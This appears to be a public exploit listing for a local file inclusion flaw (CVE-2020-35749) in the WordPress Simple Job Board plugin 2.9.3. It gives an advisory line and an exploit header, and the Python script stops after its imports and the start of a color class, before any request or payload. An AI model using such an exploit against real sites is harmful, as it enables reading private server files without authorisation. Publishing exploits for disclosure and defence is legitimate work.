Authored by Ven3xy

WordPress Simple Job Board plugin version 2.9.3 suffers from a local file inclusion vulnerability.

advisories | CVE-2020-35749

# Exploit Title: WordPress Plugin Simple Job Board 2.9.3 - Local File Inclusion
# Date: 2022-02-06
# Exploit Author: Ven3xy
# Vendor Homepage: https://wordpress.org/plugins/simple-job-board/
# Software Link: https://downloads.wordpress.org/plugin/simple-job-board.2.9.3.zip
# Version: 2.9.3
# Tested on: Ubuntu 20.04 LTS
# CVE : CVE-2020-35749


import requests
import sys
import time

class color:
HEADER = '